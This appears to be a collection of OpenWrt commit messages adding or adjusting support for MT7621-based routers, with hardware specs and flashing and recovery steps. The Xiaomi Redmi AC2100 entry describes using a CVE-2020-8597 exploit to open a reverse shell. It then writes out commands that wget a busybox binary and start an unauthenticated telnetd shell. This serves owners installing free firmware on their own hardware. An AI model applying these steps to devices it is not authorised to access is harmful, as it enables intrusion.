NETGEAR WAC104 is an AP based on castrated R6220, without WAN
port and USB.
SoC: MediaTek MT7621ST
RAM: 128M DDR3
FLASH: 128M NAND
WiFi: MediaTek MT7612EN an+ac
MediaTek MT7603EN bgn
ETH: MediaTek MT7621ST (4x LAN)
BTN: 1x Connect (WPS), 1x WLAN, 1x Reset
LED: 7x (3x GPIO controlled)
Installation:
Login to netgear webinterface and flash factory.img
Back to stock:
Use nmrpflash to revert stock image.
Signed-off-by: Pawel Dembicki <paweldembicki@gmail.com>
Specification:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN, in Amber and White
- UART: On board near ethernet, opposite side from power
- Modified u-boot
Installation:
1. Run linked exploit to get shell, startup telnet and wget the files over
2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0
Restore to stock:
1. Setup PXE and TFTP server serving stock firmware image
(See dhcp-boot option of dnsmasq)
2. Hold reset button down before powering on and wait for flashing amber led
3. Release reset button
4. Wait until status led changes from flashing amber to white
Notes:
This device has dual kernel and rootfs slots like other Xiaomi devices currently
supported (mir3g, etc.) thus, we use the second slot and overwrite the first
rootfs onwards in order to get more space.
Exploit and detailed instructions:
https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100
An implementation of CVE-2020-8597 against stock firmware version 1.0.14
This requires a computer with ethernet plugged into the wan port and an active
PPPoE session, and if successful will open a reverse shell to 192.168.31.177
on port 31337.
As this shell is somewhat unreliable and likely to be killed in a random amount
of time, it is recommended to wget a static compiled busybox binary onto the
device and start telnetd with it.
The stock telnetd and dropbear unfortunately appear inoperable.
(Disabled on release versions of stock firmware likely)
Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox
chmod a+x /tmp/busybox
/tmp/busybox telnetd -l /bin/sh
Tested-by: David Martinez <bonkilla@gmail.com>
Signed-off-by: Richard Huynh <voxlympha@gmail.com>
The Linksys EA7500 v2 is advertised as AC1900, but its internal
hardware is AC2600 capable.
Hardware
--------
SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads)
RAM: 256M (Nanya NT5CC128M16IP-DI)
FLASH: 128MB NAND (Macronix MX30LF1G18AC-TI)
ETH: 5x 10/100/1000 Mbps Ethernet (MT7530)
WIFI:
- 2.4GHz: 1x MT7615N (4x4:4)
- 5GHz: 1x MT7615N (4x4:4)
- 4 antennas: 3 external detachable antennas and 1 internal
USB:
- 1x USB 3.0
- 1x USB 2.0
BTN:
- 1x Reset button
- 1x WPS button
LEDS:
- 1x White led (Power)
- 6x Green leds (link lan1-lan4, link wan, wps)
- 5x Orange leds (act lan1-lan4, act wan) (working but unmodifiable)
Everything works correctly.
Installation
------------
The “factory” openwrt image can be flashed directly from OEM stock
firmware. After the flash the router will reboot automatically.
However, due to the dual boot system, the first installation could fail
(if you want to know why, read the footnotes).
If the flash succeed and you can reach OpenWrt through the web
interface or ssh, you are done.
Otherwise the router will try to boot 3 times and then will
automatically boot the OEM firmware (don’t turn off the router.
Simply wait and try to reach the router through the web interface
every now and then, it will take few minutes).
After this, you should be back in the OEM firmware.
Now you have to flash the OEM Firmware over itself using the OEM web
interface (I tested it using the FW_EA7500v2_2.0.8.194281_prod.img
downloaded from the Linksys website).
When the router reboots flash the “factory” OpenWrt image and this
time it should work.
After the OpenWrt installation you have to use the sysupgrade image
for future updates.
Restore OEM Firmware
--------------------
After the OpenWrt flash, the OEM firmware is still stored in the
second partition thanks to the dual boot system.
You can switch from OpenWrt to OEM firmware and vice-versa failing
the boot 3 times in a row:
1) power on the router
2) wait 15 seconds
3) power off the router
4) repeat steps 1-2-3 twice more.
5) power on the router and you should be in the “other” firmware
If you want to completely remove OpenWrt from your router, switch to
the OEM firmware and then flash OEM firmware from the web interface
as a normal update.
This procedure will overwrite the OpenWrt partition.
Footnotes
---------
The Linksys EA7500-v2 has a dual boot system to avoid bricks.
This system works using 2 pair of partitions:
1) "kernel" and "rootfs"
2) "alt_kernel" and "alt_rootfs".
After 3 failed boot attempts, the bootloader tries to boot the other
pair of partitions and so on.
This system is managed by the bootloader, which writes a bootcount in
the s_env partition, and if successfully booted, the system add a
"zero-bootcount" after the previous value.
A system update performed from OEM firmware, writes the firmware on the
other pair of partitions and sets the bootloader to boot the new pair
of partitions editing the “boot_part” variable in the bootloader vars.
Effectively it's a quick and safe system to switch the selected boot
partition.
Another way to switch the boot partition is:
1) power on the router
2) wait 15 seconds
3) power off the router
4) repeat steps 1-2-3 twice more.
5) power on the router and you should be in the “other” firmware
In this OpenWrt port, this dual boot system is partially working
because the bootloader sets the right rootfs partition in the cmdline
but unfortunately OpenWrt for ramips platform overwrites the cmdline
so is not possible to detect the right rootfs partition.
Because all of this, I preferred to simply use the first pair of
partitions and set read-only the other pair.
However this solution is not optimal because is not possible to know
without opening the case which is the current booted partition.
Let’s take for example a router booting the OEM firmware from the first
pair of partitions. If we flash the OpenWrt image, it will be written
on the second pair. In this situation the router will bootloop 3 times
and then will automatically come back to the first pair of partitions
containg the OEM firmware.
In this situation, to flash OpenWrt correctly is necessary to switch
the booting partition, flashing again the OEM firmware over itself.
At this point the OEM firmware is on both pair of partitions but the
current booted pair is the second one.
Now, flashing the OpenWrt factory image will write the firmware on
the first pair and then will boot correctly.
If this limitation in the ramips platform about the cmdline will be
fixed, the dual boot system can also be implemented in OpenWrt with
almost no effort.
Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com>
Co-Developed-by: Jackson Lim <jackcolentern@gmail.com>
Signed-off-by: Jackson Lim <jackcolentern@gmail.com>
The "proper" vendor prefix for Ubiquiti is "ubnt", this is used in
all targets except ramips and also recommended by the kernel.
This patch adjusts the various board/image/device name variables
accordingly. Since we touch it anyway, this also adds the space
in "EdgeRouter X" as a hyphen to those variables to really make
them consistent with the model name.
While at it, create a real shared definition for the devices in
image/mt7621.mk instead of deriving one device from another.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
I-O DATA WN-AX2033GR is roughly the same as I-O DATA
WN-AX1167GR2. The difference is Wi-Fi feature.
Specification
=============
- SoC: MediaTek MT7621A
- RAM: DDR3 128 MiB
- Flash Memory: NAND 128 MiB (Spansion S34ML01G200TF100)
- Wi-Fi: MediaTek MT7603E
- Wi-Fi: MediaTek MT7615
- Ethernet: 5x 10 Mbps / 100 Mbps / 1000 Mbps (1x WAN, 4x LAN)
- LED: 2x green LED
- Input: 2x tactile switch, 1x slide switch
- Serial console: 57600bps, PCB through hole J5 (Vcc, TX, RX, NC, GND)
- Power: DC 12V
This device only supports channel 1-13 and 36-140.
Thus, narrower frequency limits compared to other devices are required
for limiting wi-fi frequency correctly.
Without this, non-supported frequencies are activated.
Flash instructions
==================
1. Open the router management page (192.168.0.1).
2. Update router firmware using "initramfs-kernel.bin".
3. After updating, run sysupgrade with "sysupgrade.bin".
Recovery instructions
=====================
WN-AX2033GR contains Zyxel Z-LOADER
1. Setup TFTP server (IP address: 10.10.10.3).
2. Put official firmware into TFTP server directory (distribution site:
https://www.iodata.jp/lib/software/w/2068.htm)
3. Connect WX-AX2033GR Ethernet port and computer that runs TFTP server.
4. Connect to serial console.
5. Interrupt booting by Esc key.
6. Flash firmware using "ATNR 1,[firmware filename]" command.
Signed-off-by: Yanase Yuki <dev@zpc.sakura.ne.jp>
[adjust for kernel 5.4, add recovery instructions/frequency comment]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
So far, image/device/board names for Mikrotik devices in mt7621 have
been used quite inconsistently.
This patch harmonizes the naming scheme by applying the same style
as used lately in ath79, i.e. using "RouterBOARD" as separate word
in the model name (instead of RB prefix for the number) and deriving
the board/device name from that (= make lower case and replace spaces
by hyphens).
This style has already been used for most the model/DEVICE_MODEL
variables in mt7621, so this is essentially just adjusting the remaining
variables to that.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
DSA requires master netdev to be up before any of its slave ports.
Bring it up during preinit so that the first lan port can be used
on failsafe.
Signed-off-by: Chuanhong Guo <gch981213@gmail.com>
This patch adds support for the Netgear R6800, aka Netgear AC1900 and
R6800-100PES.
Specification:
- SoC: MediaTek MT7621AT (880 MHz)
- Flash: 128 MiB NAND
- RAM: 256 MiB
- Wireless: MediaTek MT7615EN b/g/n , MediaTek MT7615EN an+ac
- LAN speed: 10/100/1000
- LAN ports: 4
- WAN speed: 10/100/1000
- WAN ports: 1
- USB 2.0
- USB 3.0
- Serial baud rate of Bootloader and factory firmware: 57600
Known issues:
- Device has 3 wifi LEDs: Wifi 5Ghz, Wifi 2.4Ghz and Wifi on/off.
Wifi on/off is not used.
Installation:
- apply factory image via stock web-gui.
Back to stock:
- nmrpflash can be used to recover to the stock Netgear firmware.
Signed-off-by: Pawel Dembicki <paweldembicki@gmail.com>
The correct model name of WF-2881 is WF2881 without hyphen. The former used
boardnames are not added to SUPPORTED_DEVICES, to make it explicit that the
sysupgrade-tar image, which is newly added in the previous commit, should
not be used to upgrade from older version.
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
[adjust commit title]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
WF-2881 sysupgrade image uses UBI rootfs, but still relies on
default_do_upgrade. Because of this, config backup is not restored after
sysupgrade. It can be fixed by switching to nand_do_upgrade and
sysupgrade-tar image. default_do_upgrade does not handle sysupgrade-tar
properly, so one should use factory image to upgrade from older version.
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
ALFA Network Quad-E4G is a universal Wi-Fi/4G platform, which offers
three miniPCIe (PCIe, USB 2.0, SIM) and a single M.2 B-key (dual-SIM,
USB 3.0) slots, RTC and five Gigabit Ethernet ports with PoE support.
Specification:
- MT7621A (880 MHz)
- 256/512 MB of RAM (DDR3)
- 16/32+ MB of FLASH (SPI NOR)
- optional second SPI flash (8-pin WSON/SOIC)
- 1x microSD (SDXC) flash card reader
- 5x 10/100/100 Mbps Ethernet, with passive PoE support (24 V) in LAN1
- optional 802.3at/af PoE module for WAN
- 3x miniPCIe slot (with PCIe and USB 2.0 buses, micro SIM and 5 V)
- 1x M.2/NGFF B-key 3042 (USB 3.0/2.0, mini + micro SIM)
- RTC (TI BQ32002, I2C bus) with backup battery (CR2032)
- external hardware watchdog (EM Microelectronic EM6324)
- 1x USB 2.0 Type-A
- 1x micro USB Type-B for system serial console (Holtek HT42B534)
- 11x LED (5 for Ethernet, 5 driven by GPIO, 1x power indicator)
- 3x button (reset, user1, user2)
- 1x I2C (4-pin, 2.54 mm pitch) header on PCB
- 4x SIM (6-pin, 2.00 mm pitch) headers on PCB
- 2x UART2/3 (4-pin, 2.54 mm pitch) headers on PCB
- 1x mechanical power switch
- 1x DC jack with lock (24 V)
Other:
- U-Boot selects default SIM slot, based on value of 'default_sim' env
variable: '1' or unset -> SIM1 (mini), '2' -> SIM2 (micro). This board
has additional logic circuit for M.2 SIM switching. The 'sim-select'
will work only if both SIM slots are occupied. Otherwise, always slot
with SIM inside is selected, no matter 'sim-select' value.
- U-Boot enables power in all three miniPCIe and M.2 slots before
loading the kernel
- this board supports 'dual image' feature (controlled by 'dual_image'
U-Boot environment variable)
- all three miniPCIe slots have additional 5 V supply on pins 47 and 49
- the board allows to install up to two oversized miniPCIe cards (vendor
has dedicated MediaTek MT7615N/D cards for this board)
- this board has additional logic circuit controlling PERSTn pins inside
miniPCIe slots. By default, PERSTn (GPIO19) is routed to all miniPCIe
slots but setting GPIO22 to high allows PERSTn control per slot, using
GPIO23-25 (value is inverted)
You can use the 'sysupgrade' image directly in vendor firmware which is
based on OpenWrt (make sure to not preserve settings - use 'sysupgrade
-n -F ...' command). Alternatively, use web recovery mode in U-Boot:
1. Power the device with reset button pressed, the modem LED will start
blinking slowly and after ~3 seconds, when it starts blinking faster,
you can release the button.
2. Setup static IP 192.168.1.2/24 on your PC.
3. Go to 192.168.1.1 in browser and upload 'sysupgrade' image.
Signed-off-by: Piotr Dymacz <pepe2k@gmail.com>
While most of the target's contents are split into subtargets, the
base-files are maintained for the target as a whole.
However, OpenWrt already implements a mechanism that will use (and
even prefer) files in the subtargets' directories. This can be
exploited to make several scripts subtarget-specific and thus save
some space.
In certain cases, keeping files in parent (=target) base-files was
more convenient, and thus no splitting was performed for those.
Note that this will increase overall code lines, but reduce code
per subtarget.
base-files ipk size reduction:
master (mt7621) 60958 B
split (mt7620) 46358 B (- 14.3 kiB)
split (mt7621) 48759 B (- 11.9 kiB)
split (mt76x8) 44948 B (- 15.6 kiB)
split (rt288x) 43508 B (- 17.0 kiB)
split (rt305x) 45616 B (- 15.0 kiB)
split (rt3883) 44176 B (- 16.4 kiB)
Run-tested on:
GL.iNet GL-MT300N-V2 (mt76x8)
D-Link DWR-116 (mt7620)
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
